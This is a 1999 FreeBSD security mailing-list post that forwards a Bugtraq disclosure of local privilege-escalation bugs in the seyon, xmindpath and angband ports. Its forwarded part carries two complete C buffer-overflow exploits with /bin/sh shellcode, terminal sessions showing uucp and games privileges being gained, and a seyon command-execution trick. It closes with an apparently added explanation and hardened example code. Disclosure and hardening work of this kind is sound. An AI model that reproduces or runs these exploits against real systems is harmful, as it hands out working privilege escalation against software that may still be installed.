Date:      Wed, 1 Dec 1999 09:32:42 -0800
From:      Bill Swingle <unfurl@dub.net>
To:        security@freebsd.org
Cc:        Jordan Hubbard <jkh@freebsd.org>
Subject:   [btellier@USA.NET: Several FreeBSD-3.3 vulnerabilities]
Message-ID:  <19991201093242.A71817@dub.net>

Ok, so I know these are all vulnerabilities in third party software, and
that the actual problem with each program is not really ours to fix but
each of these problems can be avoided with small changes to the
respective ports. 

FreeBSD vulnerabilities are few and far between, and even fewer are
published on Bugtraq. Having something as simple as this get past us is
really embarrassing. It says to the security community at large that
we're not even concerned enough with security to fix these small holes.
We all know that's not true. 

I'm not sure who dropped the ball here, and I'm not pointing fingers. I
just hope that we can pull together in the future to avoid more of this.

(just my .04)

-Bill

----- Forwarded message from Brock Tellier <btellier@USA.NET> -----

X-Mailer: USANET web-mailer (M3.4.0.33)
Date:         Tue, 30 Nov 1999 16:08:29 MST
Reply-To: Brock Tellier <btellier@USA.NET>
From: Brock Tellier <btellier@USA.NET>
Subject:      Several FreeBSD-3.3 vulnerabilities
To: BUGTRAQ@SECURITYFOCUS.COM

Greetings,

RANT
I've given the FreeBSD team about a month to get something official together. 
Maintainers were supposedly contacted, but no progress has been made.  As
promised, here are the goods:

OVERVIEW
Vulnerabilities in seyon, xmindpath and angband can be used to upgrade
privileges.

BACKGROUND
All of the vulnerabilities discussed herein are based on my work on
FreeBSD 3.3-RELEASE. Each of the programs was installed with the
default permissions given when unpacked with sysinstall. 
These permissions are:
-rwxr-sr-x 1 bin dialer 88480 Sep 11 00:55 /usr/X11R6/bin/seyon
-rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
-r-xr-sr-x 1 bin games 481794 Sep 11 01:10 /usr/X11R6/bin/angband
These programs may be installed on other systems with different
permissions as a result of a version change or a different packing
scheme.

DETAILS
 
Vuln #1 The Seyon Mess
 
To summarize: Seyon was supposedly not meant to run with additional
privileges. There are numerous problems with seyon and I've probably not
found all of them. They are:
 
Buffer Overflows:
 1. $HOME
 2. seyon -emulator $BUF
 3. seyon -modems $BUF
 4. many long text box input string overflows while in program
Input Validation:
 1. seyon will search $PATH for "xterm" and "seyon-emu" and exec with
 fullprivs (as noted in previous advisory)
 2. seyon -emulator /program/to/execute/with/full/privs
  
These privileges might be upgradable to root if you are able to
 a. trojan a dialer-writable file or
 b. use a symlink attack to clobber .rhosts or similar
 c. snoop device i/o.
 
Vuln #2 xmindpath

/usr/X11R6/bin/xmindpath (suid uucp by default), contains a buffer
overflow which will allow any user to gain uucp privs. Simply enough:
xmindpath -f $BUF

See my "faxalter" advisory for more info on gaining root w/euid uucp.
 
Vuln #3 fun and egid games
 
Want to impress your friends with the highest tetris score known to man?
 
Gain egid games with a buffer overflow in /usr/X11R6/bin/angband. The
overflows are:
 angband -u$BUF
 angband -d$BUF
 
EXPLOITS
 
Seyon:
I've not written buffer overflow exploits for Seyon since an
equivalent-yield program execution vulnerability exists, but it is
certainly possible. The latter exploit is:
seyon -emulator /program/to/execute
 
Note that you'll have to execute a program that will ignore the args
that seyon passes to it automatically as shown:
 
bash-2.03$ echo 'void main() { system("/usr/bin/id"); }' > id.c
bash-2.03$ gcc -o id id.c
bash-2.03$ seyon -emulator ./id
uid=1000(xnec) gid=1000(xnec) egid=68(dialer) groups=68(dialer), 1000(xnec)
 
xmindpath:
bash-2.03$ ls -la `which xmindpath`; id
-rwsr-xr-x 1 uucp bin 7780 Sep 11 05:15 /usr/X11R6/bin/xmindpath
uid=1000(xnec) gid=1000(xnec) groups=1000(xnec)
bash-2.03$ ./xmindx
FreeBSD xmindpath exploit /path/to/xmindpath -f $RET
Brock Tellier btellier@usa.net
Using addr: 0xbfbfcfa8
bash-2.03$ xmindpath -f $RET
lock open: File name too long
$ id
uid=1000(xnec) euid=66(uucp) gid=1000(xnec) groups=1000(xnec)
$
 
/*
 * FreeBSD 3.3 xmindpath exploit gives euid uucp
 * Compile: gcc -o xmindx xmindx.c
 * Usage: ./xmindx <offset>
 *        /path/to/xmindpath -f $RET
 * Brock Tellier <btellier@usa.net>
 *
 */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shell[]= /* mudge@l0pht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

#define EGGLEN 2048
#define RETLEN 279
#define ALIGN 3
#define NOP 0x90

int main(int argc, char *argv[]) {

    long int offset=0;
    int i;
    int egglen = EGGLEN;
    int retlen = RETLEN;
    long int addr = 0xbfbfcfa8;
    char egg[EGGLEN];
    char ret[RETLEN + 1];   /* one extra byte for the NUL putenv() needs */

    if (argc == 2) offset = atoi(argv[1]);

    addr=addr + offset;

    fprintf(stderr, "FreeBSD xmindpath exploit /path/to/xmindpath -f $RET\n");
    fprintf(stderr, "Brock Tellier btellier@usa.net\n");
    fprintf(stderr, "Using addr: 0x%lx\n", addr);

    /* EGG: a NOP sled with the shellcode at its end, NUL-terminated */
    memset(egg,NOP,egglen);
    memcpy(egg+(egglen - strlen(shell) - 1),shell,strlen(shell));
    egg[egglen - 1] = '\0';

    /* RET: the guessed sled address repeated, shifted by ALIGN bytes so
       the copies land 4-byte aligned in the overflowed frame */
    for(i=ALIGN;i< retlen;i+=4)
        *(int *)&ret[i]=addr;
    ret[retlen] = '\0';

    memcpy(egg, "EGG=", 4);
    putenv(egg);
    memcpy(ret,"RET=",4);
    putenv(ret);

    system("/usr/local/bin/bash");

    return 0;
}
 
 
angband:
 
bash-2.03$ gcc -o angames angames.c
bash-2.03$ angband `./angames`
eip=0xbfbfc6b4 offset=0 buflen=1095
NOPs to 1021
Shellcode to 1088
eip to 1092
garbage to 1094
$ id
uid=1000(xnec) gid=1000(xnec) egid=13(games) groups=13(games), 1000(xnec)
$ 

/* FreeBSD 3.3 angband exploit yields egid of group games
 * usage: gcc -o angames angames.c
 *        /path/to/angband `./angames <offset>`
 * overflow is 1088bytes of NOP/Shellcode + 4bytes EIP +2bytes garbage
 * Brock Tellier <btellier@usa.net>
 */

#include <stdio.h>
#include <stdlib.h>

char shell[]= /* mudge@l0pht.com */
"\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
"\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
"\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
"\x9a>:)(:<\xe8\xc6\xff\xff\xff/bin/sh";

int main (int argc, char *argv[] ) {
    int x = 0;
    int y = 0;
    int offset = 0;
    int bsize = 1095;       /* 2bytes"-u" + overflowed buf's bytes + */
    char buf[bsize];        /* 4bytesEBP + 4bytesEIP + 2bytesGarbage */
    char arg[bsize + 2];
    unsigned int eip = 0xbfbfc6b4; /* FreeBSD 3.3 */

    if (argv[1]) {
        offset = atoi(argv[1]);
        eip = eip + offset;
    }
    fprintf(stderr, "eip=0x%x offset=%d buflen=%d\n", eip, offset, bsize);

    /* NOP sled */
    for ( x = 0; x < 1021; x++) buf[x] = 0x90;
    fprintf(stderr, "NOPs to %d\n", x);

    /* 67 bytes of shellcode */
    for ( y = 0; y < 67 ; x++, y++) buf[x] = shell[y];
    fprintf(stderr, "Shellcode to %d\n",x);

    /* saved EIP, little-endian */
    buf[x++] = eip & 0x000000ff;
    buf[x++] = (eip & 0x0000ff00) >> 8;
    buf[x++] = (eip & 0x00ff0000) >> 16;
    buf[x++] = (eip & 0xff000000) >> 24;
    fprintf(stderr, "eip to %d\n",x);
    buf[x++] = 'X';
    buf[x++] = 'X';
    fprintf(stderr, "garbage to %d\n", x);

    buf[bsize - 1] = '\0';

    sprintf(arg, "-u%s", buf);
    arg[bsize + 1] = '\0';

    printf("%s", arg);

    return 0;
}

Brock Tellier
UNIX Systems Administrator
Chicago, IL, USA


----- End forwarded message -----

-- 
-=| --- B i l l   S w i n g l e --- http://www.dub.net/
-=| unfurl@dub.net  - unfurl@freebsd.org - bill@cdrom.com 
-=| Different all twisty a of in maze are you, passages little
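Both bug classes in the forwarded advisory come down to two things a setuid/setgid program must not do: copy an argv value into a fixed buffer without a bound (xmindpath -f $BUF, angband -u$BUF), and run a program named by the user, or found through the user's $PATH, while still holding the extra uid/gid (seyon -emulator, seyon's xterm lookup). The following is an added example, not code from the thread or from seyon, xmindpath or angband, showing each pattern next to its fix in a small stand-in program. The function names, the 64-byte buffer, and the choice of /usr/bin/id as the helper are assumptions made for illustration.

```c
/* Added example (not from the advisory): an unbounded argv copy beside a
 * bounded one, and a privilege drop performed before a user-named helper
 * is executed. Builds with cc on FreeBSD or Linux. */
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

#define NAMELEN 64   /* assumed size of the fixed buffer */

/* Vulnerable pattern: no bound at all, so an argument longer than the
 * destination overwrites the saved frame pointer and return address.
 * Kept here only for contrast; never feed it untrusted input. */
void unsafe_set_name(char *dst, const char *src) {
    strcpy(dst, src);
}

/* Hardened pattern: reject anything that does not fit. Rejecting beats
 * silent truncation, because a truncated name may refer to a different
 * file than the one the caller asked for. */
int safe_set_name(char *dst, size_t dstlen, const char *src) {
    size_t n = strlen(src);
    if (n >= dstlen) {
        errno = ENAMETOOLONG;
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Give up setgid/setuid privileges permanently and verify that it took.
 * Called before anything the user can name is executed, so the helper
 * runs with the caller's real ids only. A failed drop is fatal. */
int drop_privs(void) {
    gid_t rgid = getgid();
    uid_t ruid = getuid();
    if (setgid(rgid) != 0) return -1;   /* also clears the saved gid */
    if (setuid(ruid) != 0) return -1;
    if (getegid() != rgid || geteuid() != ruid) return -1;
    return 0;
}

/* Run a helper with privileges dropped. The caller passes an absolute
 * path and execv() is used, so the user's $PATH never selects the binary
 * (the seyon xterm/seyon-emu problem). Returns the child's exit status. */
int run_unprivileged(const char *prog, char *const argv[]) {
    int status;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        if (drop_privs() != 0) _exit(127);
        execv(prog, argv);
        _exit(127);
    }
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(int argc, char *argv[]) {
    char name[NAMELEN];
    char *const idargv[] = { "id", NULL };

    if (argc < 3 || strcmp(argv[1], "-f") != 0) {
        fprintf(stderr, "usage: %s -f <name>\n", argv[0]);
        return 2;
    }
    if (safe_set_name(name, sizeof name, argv[2]) != 0) {
        perror("name");             /* prints "name: File name too long" */
        return 1;
    }
    printf("name=%s\n", name);
    /* the helper sees the real uid/gid only, not the setgid group */
    return run_unprivileged("/usr/bin/id", idargv);
}
```

Installed setgid (for instance chgrp dialer; chmod 2755), `./demo -f $(head -c 100 /dev/zero | tr '\0' A)` exits with "File name too long" instead of overflowing, and a short name prints an id line with no extra egid, which is the check to run against a port after changing it.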







